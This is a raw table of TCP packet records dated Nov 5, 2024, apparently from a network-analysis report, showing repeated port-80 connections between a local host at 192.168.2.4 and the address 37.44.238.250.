                                                                                            Nov 5, 2024 23:53:13.746817112 CET4985980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:13.751595974 CET804985937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:14.102423906 CET4985980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:14.107570887 CET804985937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:14.494113922 CET4986480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:14.494262934 CET4985980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:14.499950886 CET804986437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:14.500037909 CET4986480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:14.500173092 CET4986480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:14.500487089 CET804985937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:14.500564098 CET4985980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:14.505127907 CET804986437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:14.615629911 CET4986680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:14.620660067 CET804986637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:14.620744944 CET4986680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:14.620839119 CET4986680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:14.625672102 CET804986637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:14.852369070 CET4986480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:14.857340097 CET804986437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:14.857372046 CET804986437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:15.002820015 CET4986680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:15.007951021 CET804986637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:15.319000959 CET804986437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:15.391180038 CET804986437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:15.391253948 CET4986480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:15.444096088 CET804986637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:15.517302990 CET804986637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:15.517366886 CET4986680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:15.632967949 CET4975180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:15.635121107 CET4986480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:15.635188103 CET4986680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:15.635848999 CET4987380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:15.640360117 CET804986437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:15.640562057 CET4986480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:15.640662909 CET804987337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:15.640713930 CET4987380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:15.640732050 CET804986637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:15.640778065 CET4986680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:15.640878916 CET4987380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:15.645699978 CET804987337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:15.992999077 CET4987380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:15.998066902 CET804987337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:16.453126907 CET804987337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:16.526315928 CET804987337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:16.528254986 CET4987380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:16.791531086 CET4987380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:16.792334080 CET4988080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:16.797103882 CET804987337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:16.797158003 CET4987380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:16.797450066 CET804988037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:16.797514915 CET4988080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:16.797646999 CET4988080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:16.802546024 CET804988037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:17.149292946 CET4988080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:17.154244900 CET804988037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:17.620317936 CET804988037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:17.698156118 CET804988037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:17.702090979 CET4988080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:18.011358976 CET4988080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:18.012087107 CET4988680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:18.121520042 CET804988637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:18.121800900 CET4988680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:18.121941090 CET4988680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:18.122167110 CET804988037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:18.122227907 CET4988080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:18.128664017 CET804988637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:18.477348089 CET4988680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:18.482625008 CET804988637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:18.944107056 CET804988637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:19.018728018 CET804988637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:19.018790960 CET4988680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:19.148978949 CET4988680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:19.150549889 CET4989280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:19.154179096 CET804988637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:19.154234886 CET4988680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:19.155644894 CET804989237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:19.155724049 CET4989280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:19.155848026 CET4989280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:19.160804033 CET804989237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:19.508780003 CET4989280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:19.513766050 CET804989237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:19.968940973 CET804989237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:20.039798021 CET4989280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:20.041867018 CET804989237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:20.209233046 CET4989280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:20.407516003 CET4989280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:20.411132097 CET4989880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:20.412798882 CET804989237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:20.412858963 CET4989280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:20.416009903 CET804989837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:20.416084051 CET4989880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:20.418812990 CET4989880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:20.423713923 CET804989837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:20.581590891 CET4989880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:20.625297070 CET4990080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:20.627306938 CET804989837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:20.630228996 CET804990037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:20.630295038 CET4990080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:20.630412102 CET4990080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:20.635255098 CET804990037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:20.977374077 CET4990080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:20.982753038 CET804990037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:21.002424002 CET804989837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:21.002506971 CET4989880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:21.444396973 CET804990037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:21.518661976 CET804990037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:21.518707037 CET4990080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:21.670212030 CET4990080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:21.670813084 CET4990980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:21.675498962 CET804990037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:21.675632000 CET804990937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:21.675699949 CET4990080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:21.675740957 CET4990980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:21.675808907 CET4990980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:21.680658102 CET804990937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:22.024342060 CET4990980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:22.029761076 CET804990937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:22.486474037 CET804990937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:22.539808035 CET4990980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:22.562428951 CET804990937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:22.742907047 CET4990980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:22.852025032 CET4991680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:22.857100010 CET804991637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:22.857806921 CET4991680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:22.857980013 CET4991680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:22.862932920 CET804991637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:23.217737913 CET4991680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:23.222819090 CET804991637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:23.670419931 CET804991637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:23.743163109 CET804991637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:23.746081114 CET4991680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:23.863468885 CET4990980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:23.866849899 CET4991680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:23.867569923 CET4992280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:23.872179031 CET804991637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:23.872251987 CET4991680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:23.872451067 CET804992237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:23.872657061 CET4992280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:23.872757912 CET4992280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:23.877545118 CET804992237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:24.227415085 CET4992280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:24.238020897 CET804992237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:24.685395956 CET804992237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:24.764105082 CET804992237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:24.766181946 CET4992280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:24.925182104 CET4992280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:24.925877094 CET4992880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:24.930350065 CET804992237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:24.930732012 CET804992837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:24.930840015 CET4992880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:24.931308031 CET4992880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:24.931338072 CET4992280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:24.936177969 CET804992837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:25.290458918 CET4992880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:25.295488119 CET804992837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:25.628719091 CET4993280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:25.633579016 CET804993237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:25.634088039 CET4993280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:25.637578964 CET4993280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:25.642405033 CET804993237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:25.740813017 CET804992837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:25.761236906 CET4992880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:25.766777039 CET804992837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:25.766853094 CET4992880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:25.992968082 CET4993280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:25.997951031 CET804993237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:25.997984886 CET804993237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:26.021116018 CET4993380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:26.025928974 CET804993337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:26.025985003 CET4993380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:26.026117086 CET4993380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:26.031280994 CET804993337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:26.383626938 CET4993380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:26.390095949 CET804993337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:26.453510046 CET804993237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:26.532166958 CET804993237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:26.532257080 CET4993280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:27.027290106 CET804993337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:27.027825117 CET804993337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:27.027868032 CET4993380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:27.027987003 CET804993337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:27.028031111 CET4993380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:27.156439066 CET4993280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:27.156670094 CET4993380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:27.157615900 CET4994080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:27.161947966 CET804993237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:27.161992073 CET4993280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:27.162425995 CET804994037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:27.162480116 CET4994080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:27.162604094 CET4994080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:27.163145065 CET804993337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:27.163192034 CET4993380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:27.167342901 CET804994037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:27.508645058 CET4994080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:27.513571024 CET804994037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:27.974730015 CET804994037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:28.039783001 CET4994080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:28.050991058 CET804994037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:28.242913961 CET4994080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:28.508019924 CET4994080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:28.509011030 CET4994680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:28.514111996 CET804994637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:28.514173031 CET4994680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:28.514350891 CET4994680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:28.514501095 CET804994037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:28.514542103 CET4994080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:28.520206928 CET804994637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:28.868041039 CET4994680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:28.873136044 CET804994637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:29.325799942 CET804994637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:29.401865959 CET804994637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:29.402174950 CET4994680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:29.522634983 CET4994680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:29.523243904 CET4995580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:29.527875900 CET804994637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:29.528136969 CET804995537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:29.528213024 CET4994680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:29.528242111 CET4995580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:29.528367043 CET4995580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:29.533227921 CET804995537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:29.883605957 CET4995580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:29.888477087 CET804995537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:31.334186077 CET804995537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:31.334752083 CET804995537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:31.334808111 CET4995580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:31.335114956 CET804995537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:31.335192919 CET804995537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:31.335330009 CET4995580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:31.335648060 CET804995537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:31.335675955 CET4995580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:31.335690975 CET4995580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:31.491111040 CET4995580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:31.491753101 CET4996180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:31.496597052 CET804995537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:31.496639967 CET804996137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:31.496694088 CET4995580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:31.496742964 CET4996180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:31.496860027 CET4996180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:31.502055883 CET804996137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:31.540909052 CET4996280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:31.546555042 CET804996237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:31.550060034 CET4996280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:31.550164938 CET4996280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:31.555419922 CET804996237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:31.852349043 CET4996180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:31.857326984 CET804996137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:31.899218082 CET4996280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:31.904103041 CET804996237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:31.904184103 CET804996237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:32.311724901 CET804996137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:32.360049963 CET804996237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:32.385070086 CET804996137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:32.385158062 CET4996180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:32.385715961 CET4996280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:32.391071081 CET804996237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:32.391143084 CET4996280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:32.505105019 CET4996180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:32.506210089 CET4997180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:32.510668993 CET804996137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:32.510730028 CET4996180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:32.511177063 CET804997137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:32.511240959 CET4997180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:32.511348963 CET4997180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:32.517399073 CET804997137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:32.868091106 CET4997180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:32.873334885 CET804997137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:33.322463036 CET804997137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:33.367899895 CET4997180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:33.392414093 CET804997137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:33.446037054 CET4997180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:33.565959930 CET4997180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:33.566649914 CET4997580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:33.571269035 CET804997137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:33.571964025 CET804997537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:33.572031975 CET4997180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:33.572067976 CET4997580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:33.572199106 CET4997580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:33.577440023 CET804997537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:33.931773901 CET4997580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:33.936681986 CET804997537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:34.384871006 CET804997537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:34.430402040 CET4997580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:34.457220078 CET804997537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:34.539769888 CET4997580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:34.588776112 CET4997580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:34.594198942 CET804997537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:34.594273090 CET4997580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:34.625503063 CET4998180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:34.630361080 CET804998137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:34.630450964 CET4998180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:34.630588055 CET4998180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:34.636768103 CET804998137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:34.978374958 CET4998180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:34.983328104 CET804998137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:35.441690922 CET804998137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:35.511781931 CET804998137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:35.514041901 CET4998180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:35.828656912 CET4998180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:35.832240105 CET4998680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:35.833863020 CET804998137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:35.833909988 CET4998180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:35.837091923 CET804998637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:35.837152958 CET4998680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:35.837266922 CET4998680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:35.842039108 CET804998637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:36.196834087 CET4998680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:36.203484058 CET804998637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:36.832134008 CET804998637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:36.832220078 CET804998637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:36.832292080 CET4998680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:36.832454920 CET804998637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:36.832597017 CET4998680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:36.959779024 CET4998680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:36.963007927 CET4998980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:36.965115070 CET804998637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:36.967350006 CET4998680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:36.967868090 CET804998937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:36.970056057 CET4998980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:36.970132113 CET4998980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:36.975373030 CET804998937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:37.321204901 CET4998980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:37.325998068 CET804998937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:37.424690962 CET4998980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:37.425946951 CET4999480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:37.432111025 CET804999437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:37.432271004 CET4999480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:37.432349920 CET4999480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:37.437378883 CET804999437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:37.475296021 CET804998937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:37.555332899 CET804998937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:37.555596113 CET4999580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:37.555628061 CET4998980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:37.560560942 CET804999537.44.238.250192.168.2.4
